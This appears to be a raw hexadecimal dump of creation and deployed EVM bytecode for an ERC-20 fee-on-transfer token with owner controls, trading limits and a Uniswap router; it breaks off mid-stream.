60149054906101000a900460ff1615905060175f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1680612266575060175f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b1561226f575f90505b5f81156124d85760195f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1680156122cd57505f601054115b15612397576122fa60646122ec6010548861290590919063ffffffff16565b61297c90919063ffffffff16565b90506010546012548261230d91906137ac565b612317919061381a565b60155f8282546123279190613683565b925050819055506010546013548261233f91906137ac565b612349919061381a565b60165f8282546123599190613683565b925050819055506010546011548261237191906137ac565b61237b919061381a565b60145f82825461238b9190613683565b925050819055506124b5565b60195f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1680156123ee57505f600c54115b156124b45761241b606461240d600c548861290590919063ffffffff16565b61297c90919063ffffffff16565b9050600c54600e548261242e91906137ac565b612438919061381a565b60155f8282546124489190613683565b92505081905550600c54600f548261246091906137ac565b61246a919061381a565b60165f82825461247a9190613683565b92505081905550600c54600d548261249291906137ac565b61249c919061381a565b60145f8282546124ac9190613683565b925050819055505b5b5f8111156124c9576124c88730836125ac565b5b80856124d5919061384a565b94505b6124e38787876125ac565b505050505b505050565b5f838311158290612534576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161252b9190612cce565b60405180910390fd5b505f8385612542919061384a565b9050809150509392505050565b5f80828461255d9190613683565b9050838110156125a2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612599906138c7565b60405180910390fd5b8091505092915050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361261a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612611906134b4565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603612688576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161267f90613542565b60405180910390fd5b6126938383836129c5565b6126fc81604051806060016040528060268152602001613b1c602691395f808773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546124ed9092919063ffffffff16565b5f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f208190555061278b815f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461254f90919063ffffffff16565b5f808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516128289190612e9e565b60405180910390a3505050565b5f61283f30610c7f565b9050601460095461285091906137ac565b81111561286957601460095461286691906137ac565b90505b81811115612875578190505b5f81111561288757612886816129ca565b5b5f6015819055505f6014819055505f60168190555060065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166108fc4790811502906040515f60405180830381858888f19350505050158015612900573d5f803e3d5ffd5b505050565b5f808303612915575f9050612976565b5f828461292291906137ac565b9050828482612931919061381a565b14612971576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161296890613955565b60405180910390fd5b809150505b92915050565b5f6129bd83836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f000000000000815250612bfd565b905092915050565b505050565b5f600267ffffffffffffffff8111156129e6576129e5613973565b5b604051908082528060200260200182016040528015612a145781602001602082028036833780820191505090505b50905030815f81518110612a2b57612a2a6139a0565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250507f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015612ace573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190612af291906139e1565b81600181518110612b0657612b056139a0565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050612b6b307f00000000000000000000000000000000000000000000000000000000000000008461189b565b7f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663791ac947835f8430426040518663ffffffff1660e01b8152600401612bcc959493929190613ac3565b5f604051808303815f87803b158015612be3575f80fd5b505af1158015612bf5573d5f803e3d5ffd5b505050505050565b5f8083118290612c43576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612c3a9190612cce565b60405180910390fd5b505f8385612c51919061381a565b9050809150509392505050565b5f81519050919050565b5f82825260208201905092915050565b8281835e5f83830152505050565b5f601f19601f8301169050919050565b5f612ca082612c5e565b612caa8185612c68565b9350612cba818560208601612c78565b612cc381612c86565b840191505092915050565b5f6020820190508181035f830152612ce68184612c96565b905092915050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f612d1b82612cf2565b9050919050565b612d2b81612d11565b8114612d35575f80fd5b50565b5f81359050612d4681612d22565b92915050565b5f819050919050565b612d5e81612d4c565b8114612d68575f80fd5b50565b5f81359050612d7981612d55565b92915050565b5f8060408385031215612d9557612d94612cee565b5b5f612da285828601612d38565b9250506020612db385828601612d6b565b9150509250929050565b5f8115159050919050565b612dd181612dbd565b82525050565b5f602082019050612dea5f830184612dc8565b92915050565b5f60208284031215612e0557612e04612cee565b5b5f612e1284828501612d38565b91505092915050565b5f819050919050565b5f612e3e612e39612e3484612cf2565b612e1b565b612cf2565b9050919050565b5f612e4f82612e24565b9050919050565b5f612e6082612e45565b9050919050565b612e7081612e56565b82525050565b5f602082019050612e895f830184612e67565b92915050565b612e9881612d4c565b82525050565b5f602082019050612eb15f830184612e8f565b92915050565b5f805f60608486031215612ece57612ecd612cee565b5b5f612edb86828701612d38565b9350506020612eec86828701612d38565b9250506040612efd86828701612d6b565b9150509250925092565b5f60ff82169050919050565b612f1c81612f07565b82525050565b5f602082019050612f355f830184612f13565b92915050565b612f4481612d11565b82525050565b5f602082019050612f5d5f830184612f3b565b92915050565b612f6c81612dbd565b8114612f76575f80fd5b50565b5f81359050612f8781612f63565b92915050565b5f8060408385031215612fa357612fa2612cee565b5b5f612fb085828601612d38565b9250506020612fc185828601612f79565b9150509250929050565b5f8060408385031215612fe157612fe0612cee565b5b5f612fee85828601612d38565b9250506020612fff85828601612d38565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061304d57607f821691505b6020821081036130605761305f613009565b5b50919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f61309a602083612c68565b91506130a582613066565b602082019050919050565b5f6020820190508181035f8301526130c78161308e565b9050919050565b7f54726164696e6720616c726561647920656e61626c65640000000000000000005f82015250565b5f613102601783612c68565b915061310d826130ce565b602082019050919050565b5f6020820190508181035f83015261312f816130f6565b9050919050565b5f819050919050565b5f61315961315461314f84613136565b612e1b565b612d4c565b9050919050565b6131698161313f565b82525050565b5f60c0820190506131825f830189612f3b565b61318f6020830188612e8f565b61319c6040830187613160565b6131a96060830186613160565b6131b66080830185612f3b565b6131c360a0830184612e8f565b979650505050505050565b5f815190506131dc81612d55565b92915050565b5f805f606084860312156131f9576131f8612cee565b5b5f613206868287016131ce565b9350506020613217868287016131ce565b9250506040613228868287016131ce565b9150509250925092565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f61328c602683612c68565b915061329782613232565b604082019050919050565b5f6020820190508181035f8301526132b981613280565b9050919050565b7f546f6b656e3a206e6f2045544820746f20636c656172000000000000000000005f82015250565b5f6132f4601683612c68565b91506132ff826132c0565b602082019050919050565b5f6020820190508181035f830152613321816132e8565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f613382602483612c68565b915061338d82613328565b604082019050919050565b5f6020820190508181035f8301526133af81613376565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f613410602283612c68565b915061341b826133b6565b604082019050919050565b5f6020820190508181035f83015261343d81613404565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f61349e602583612c68565b91506134a982613444565b604082019050919050565b5f6020820190508181035f8301526134cb81613492565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f61352c602383612c68565b9150613537826134d2565b604082019050919050565b5f6020820190508181035f83015261355981613520565b9050919050565b7f54726164696e67206973206e6f74206163746976652e000000000000000000005f82015250565b5f613594601683612c68565b915061359f82613560565b602082019050919050565b5f6020820190508181035f8301526135c181613588565b9050919050565b7f427579207472616e7366657220616d6f756e74206578636565647320746865205f8201527f6d61785472616e73616374696f6e416d6f756e742e0000000000000000000000602082015250565b5f613622603583612c68565b915061362d826135c8565b604082019050919050565b5f6020820190508181035f83015261364f81613616565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f61368d82612d4c565b915061369883612d4c565b92508282019050808211156136b0576136af613656565b5b92915050565b7f4d61782077616c6c6574206578636565646564000000000000000000000000005f82015250565b5f6136ea601383612c68565b91506136f5826136b6565b602082019050919050565b5f6020820190508181035f830152613717816136de565b9050919050565b7f53656c6c207472616e7366657220616d6f756e742065786365656473207468655f8201527f206d61785472616e73616374696f6e416d6f756e742e00000000000000000000602082015250565b5f613778603683612c68565b91506137838261371e565b604082019050919050565b5f6020820190508181035f8301526137a58161376c565b9050919050565b5f6137b682612d4c565b91506137c183612d4c565b92508282026137cf81612d4c565b915082820484148315176137e6576137e5613656565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f61382482612d4c565b915061382f83612d4c565b92508261383f5761383e6137ed565b5b828204905092915050565b5f61385482612d4c565b915061385f83612d4c565b925082820390508181111561387757613876613656565b5b92915050565b7f536166654d6174683a206164646974696f6e206f766572666c6f7700000000005f82015250565b5f6138b1601b83612c68565b91506138bc8261387d565b602082019050919050565b5f6020820190508181035f8301526138de816138a5565b9050919050565b7f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f5f8201527f7700000000000000000000000000000000000000000000000000000000000000602082015250565b5f61393f602183612c68565b915061394a826138e5565b604082019050919050565b5f6020820190508181035f83015261396c81613933565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b5f815190506139db81612d22565b92915050565b5f602082840312156139f6576139f5612cee565b5b5f613a03848285016139cd565b91505092915050565b5f81519050919050565b5f82825260208201905092915050565b5f819050602082019050919050565b613a3e81612d11565b82525050565b5f613a4f8383613a35565b60208301905092915050565b5f602082019050919050565b5f613a7182613a0c565b613a7b8185613a16565b9350613a8683613a26565b805f5b83811015613ab6578151613a9d8882613a44565b9750613aa883613a5b565b925050600181019050613a89565b5085935050505092915050565b5f60a082019050613ad65f830188612e8f565b613ae36020830187613160565b8181036040830152613af58186613a67565b9050613b046060830185612f3b565b613b116080830184612e8f565b969550505050505056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa264697066735822122071e2821e4bba1b74a52d1bb473a2eea7024d5feb05064f91f138e0584f1aa06164736f6c63430008190033
Deployed Bytecode
0x608060405260043610610254575f3560e01c80638ea5220f11610138578063c0246668116100b5578063e2f4560511610079578063e2f45605146108bd578063f11a24d3146108e7578063f2fde38b14610911578063f637434214610939578063f88de0c314610963578063f8b45b05146109795761025b565b8063c0246668146107dd578063c8c8ebe414610805578063d4c989d31461082f578063d85ba06314610857578063dd62ed3e146108815761025b565b8063a0d82dc5116100fc578063a0d82dc5146106d5578063a457c2d7146106ff578063a9059cbb1461073b578063b62496f514610777578063bbc0c742146107b35761025b565b80638ea5220f14610603578063921369131461062d57806395d89b41146106575780639c3b4fdc146106815780639fccce32146106ab5761025b565b806349bd5a5e116101d1578063715018a611610195578063715018a61461052f578063751039fc1461054557806375f0a8741461056f5780637bce5a04146105995780638a8c523c146105c35780638da5cb5b146105d95761025b565b806349bd5a5e1461044b5780634a62bb65146104755780636a486a8e1461049f5780636ddd1713146104c957806370a08231146104f35761025b565b80631a8145bb116102185780631a8145bb146103555780631f3fed8f1461037f57806323b872dd146103a9578063313ce567146103e5578063395093511461040f5761025b565b806306fdde031461025f578063095ea7b31461028957806310d5de53146102c55780631694505e1461030157806318160ddd1461032b5761025b565b3661025b57005b5f80fd5b34801561026a575f80fd5b506102736109a3565b6040516102809190612cce565b60405180910390f35b348015610294575f80fd5b506102af60048036038101906102aa9190612d7f565b610a33565b6040516102bc9190612dd7565b60405180910390f35b3480156102d0575f80fd5b506102eb60048036038101906102e69190612df0565b610a50565b6040516102f89190612dd7565b60405180910390f35b34801561030c575f80fd5b50610315610a6d565b6040516103229190612e76565b60405180910390f35b348015610336575f80fd5b5061033f610a91565b60405161034c9190612e9e565b60405180910390f35b348015610360575f80fd5b50610369610a9a565b6040516103769190612e9e565b60405180910390f35b34801561038a575f80fd5b50610393610aa0565b6040516103a09190612e9e565b60405180910390f35b3480156103b4575f80fd5b506103cf60048036038101906103ca9190612eb7565b610aa6565b6040516103dc9190612dd7565b60405180910390f35b3480156103f0575f80fd5b506103f9610b7a565b6040516104069190612f22565b60405180910390f35b34801561041a575f80fd5b5061043560048036038101906104309190612d7f565b610b82565b6040516104429190612dd7565b60405180910390f35b348015610456575f80fd5b5061045f610c30565b60405161046c9190612f4a565b60405180910390f35b348015610480575f80fd5b50610489610c54565b6040516104969190612dd7565b60405180910390f35b3480156104aa575f80fd5b506104b3610c66565b6040516104c09190612e9e565b60405180910390f35b3480156104d4575f80fd5b506104dd610c6c565b6040516104ea9190612dd7565b60405180910390f35b3480156104fe575f80fd5b5061051960048036038101906105149190612df0565b610c7f565b6040516105269190612e9e565b60405180910390f35b34801561053a575f80fd5b50610543610cc4565b005b348015610550575f80fd5b50610559610e17565b6040516105669190612dd7565b60405180910390f35b34801561057a575f80fd5b50610583610f06565b6040516105909190612f4a565b60405180910390f35b3480156105a4575f80fd5b506105ad610f2b565b6040516105ba9190612e9e565b60405180910390f35b3480156105ce575f80fd5b506105d7610f31565b005b3480156105e4575f80fd5b506105ed611132565b6040516105fa9190612f4a565b60405180910390f35b34801561060e575f80fd5b5061061761115a565b6040516106249190612f4a565b60405180910390f35b348015610638575f80fd5b5061064161117f565b60405161064e9190612e9e565b60405180910390f35b348015610662575f80fd5b5061066b611185565b6040516106789190612cce565b60405180910390f35b34801561068c575f80fd5b50610695611215565b6040516106a29190612e9e565b60405180910390f35b3480156106b6575f80fd5b506106bf61121b565b6040516106cc9190612e9e565b60405180910390f35b3480156106e0575f80fd5b506106e9611221565b6040516106f69190612e9e565b60405180910390f35b34801561070a575f80fd5b5061072560048036038101906107209190612d7f565b611227565b6040516107329190612dd7565b60405180910390f35b348015610746575f80fd5b50610761600480360381019061075c9190612d7f565b6112ef565b60405161076e9190612dd7565b60405180910390f35b348015610782575f80fd5b5061079d60048036038101906107989190612df0565b61130c565b6040516107aa9190612dd7565b60405180910390f35b3480156107be575f80fd5b506107c7611329565b6040516107d49190612dd7565b60405180910390f35b3480156107e8575f80fd5b5061080360048036038101906107fe9190612f8d565b61133c565b005b348015610810575f80fd5b50610819611478565b6040516108269190612e9e565b60405180910390f35b34801561083a575f80fd5b5061085560048036038101906108509190612f8d565b61147e565b005b348015610862575f80fd5b5061086b61156c565b6040516108789190612e9e565b60405180910390f35b34801561088c575f80fd5b506108a760048036038101906108a29190612fcb565b611572565b6040516108b49190612e9e565b60405180910390f35b3480156108c8575f80fd5b506108d16115f4565b6040516108de9190612e9e565b60405180910390f35b3480156108f2575f80fd5b506108fb6115fa565b6040516109089190612e9e565b60405180910390f35b34801561091c575f80fd5b5061093760048036038101906109329190612df0565b611600565b005b348015610944575f80fd5b5061094d6117c2565b60405161095a9190612e9e565b60405180910390f35b34801561096e575f80fd5b506109776117c8565b005b348015610984575f80fd5b5061098d61188e565b60405161099a9190612e9e565b60405180910390f35b6060600380546109b290613036565b80601f01602080910402602001604051908101604052809291908181526020018280546109de90613036565b8015610a295780601f10610a0057610100808354040283529160200191610a29565b820191905f5260205f20905b815481529060010190602001808311610a0c57829003601f168201915b5050505050905090565b5f610a46610a3f611894565b848461189b565b6001905092915050565b6018602052805f5260405f205f915054906101000a900460ff1681565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d81565b5f600254905090565b60155481565b60145481565b5f610ab2848484611a5e565b610b6f84610abe611894565b610b6a85604051806060016040528060288152602001613b426028913960015f8b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f610b21611894565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546124ed9092919063ffffffff16565b61189b565b600190509392505050565b5f6009905090565b5f610c26610b8e611894565b84610c218560015f610b9e611894565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461254f90919063ffffffff16565b61189b565b6001905092915050565b7f000000000000000000000000283b13b48bb780d768161c8b2c41ee5e20a0e73581565b600b5f9054906101000a900460ff1681565b60105481565b600b60029054906101000a900460ff1681565b5f805f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b610ccc611894565b73ffffffffffffffffffffffffffffffffffffffff1660055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610d5a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d51906130b0565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff1660055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35f60055f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b5f610e20611894565b73ffffffffffffffffffffffffffffffffffffffff1660055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610eae576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ea5906130b0565b60405180910390fd5b5f600b5f6101000a81548160ff0219169083151502179055505f600c819055505f600d819055505f600e819055505f600f819055505f6010819055505f6011819055505f6012819055505f6013819055506001905090565b60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600d5481565b610f39611894565b73ffffffffffffffffffffffffffffffffffffffff1660055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610fc7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fbe906130b0565b60405180910390fd5b600b60019054906101000a900460ff1615611017576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161100e90613118565b60405180910390fd5b611043307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d5f1961189b565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663f305d719473061108a30610c7f565b5f80611094611132565b426040518863ffffffff1660e01b81526004016110b69695949392919061316f565b60606040518083038185885af11580156110d2573d5f803e3d5ffd5b50505050506040513d601f19601f820116820180604052508101906110f791906131e2565b5050506001600b60016101000a81548160ff0219169083151502179055506001600b60026101000a81548160ff021916908315150217905550565b5f60055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60115481565b60606004805461119490613036565b80601f01602080910402602001604051908101604052809291908181526020018280546111c090613036565b801561120b5780601f106111e25761010080835404028352916020019161120b565b820191905f5260205f20905b8154815290600101906020018083116111ee57829003601f168201915b5050505050905090565b600f5481565b60165481565b60135481565b5f6112e5611233611894565b846112e085604051806060016040528060258152602001613b6a6025913960015f61125c611894565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546124ed9092919063ffffffff16565b61189b565b6001905092915050565b5f6113026112fb611894565b8484611a5e565b6001905092915050565b6019602052805f5260405f205f915054906101000a900460ff1681565b600b60019054906101000a900460ff1681565b611344611894565b73ffffffffffffffffffffffffffffffffffffffff1660055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146113d2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113c9906130b0565b60405180910390fd5b8060175f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df78260405161146c9190612dd7565b60405180910390a25050565b60085481565b611486611894565b73ffffffffffffffffffffffffffffffffffffffff1660055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611514576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161150b906130b0565b60405180910390fd5b8060185f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055505050565b600c5481565b5f60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b60095481565b600e5481565b611608611894565b73ffffffffffffffffffffffffffffffffffffffff1660055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611696576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161168d906130b0565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603611704576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116fb906132a2565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff1660055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a38060055f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b60125481565b6117d0611132565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614611806575f80fd5b5f4711611848576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161183f9061330a565b60405180910390fd5b3373ffffffffffffffffffffffffffffffffffffffff166108fc4790811502906040515f60405180830381858888f1935050505015801561188b573d5f803e3d5ffd5b50565b600a5481565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611909576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161190090613398565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611977576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161196e90613426565b60405180910390fd5b8060015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051611a519190612e9e565b60405180910390a3505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611acc576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ac3906134b4565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611b3a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b3190613542565b60405180910390fd5b5f8103611b5157611b4c83835f6125ac565b6124e8565b600b5f9054906101000a900460ff161561203557611b6d611132565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614158015611bdb5750611bab611132565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015611c1357505f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015611c4d575061dead73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015611c665750600560149054906101000a900460ff16155b1561203457600b60019054906101000a900460ff16611d5a5760175f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1680611d1a575060175f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b611d59576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d50906135aa565b60405180910390fd5b5b60195f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff168015611df7575060185f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b15611e9e57600854811115611e41576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611e3890613638565b60405180910390fd5b600a54611e4d83610c7f565b82611e589190613683565b1115611e99576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611e9090613700565b60405180910390fd5b612033565b60195f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff168015611f3b575060185f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b15611f8a57600854811115611f85576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611f7c9061378e565b60405180910390fd5b612032565b60185f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1661203157600a54611fe483610c7f565b82611fef9190613683565b1115612030576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161202790613700565b60405180910390fd5b5b5b5b5b5b5f61203f30610c7f565b90505f8082101590508080156120615750600b60029054906101000a900460ff165b801561207a5750600560149054906101000a900460ff16155b80156120cd575060195f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b8015612120575060175f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b8015612173575060175f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b156121b7576001600560146101000a81548160ff02191690831515021790555061219c83612835565b5f600560146101000a81548160ff0219169083151502179055505b5f600560149054906101000a900460ff1615905060175f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1680612266575060175f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b1561226f575f90505b5f81156124d85760195f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1680156122cd57505f601054115b15612397576122fa60646122ec6010548861290590919063ffffffff16565b61297c90919063ffffffff16565b90506010546012548261230d91906137ac565b612317919061381a565b60155f8282546123279190613683565b925050819055506010546013548261233f91906137ac565b612349919061381a565b60165f8282546123599190613683565b925050819055506010546011548261237191906137ac565b61237b919061381a565b60145f82825461238b9190613683565b925050819055506124b5565b60195f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1680156123ee57505f600c54115b156124b45761241b606461240d600c548861290590919063ffffffff16565b61297c90919063ffffffff16565b9050600c54600e548261242e91906137ac565b612438919061381a565b60155f8282546124489190613683565b92505081905550600c54600f548261246091906137ac565b61246a919061381a565b60165f82825461247a9190613683565b92505081905550600c54600d548261249291906137ac565b61249c919061381a565b60145f8282546124ac9190613683565b925050819055505b5b5f8111156124c9576124c88730836125ac565b5b80856124d5919061384a565b94505b6124e38787876125ac565b505050505b505050565b5f838311158290612534576040517f08c379a0000000000000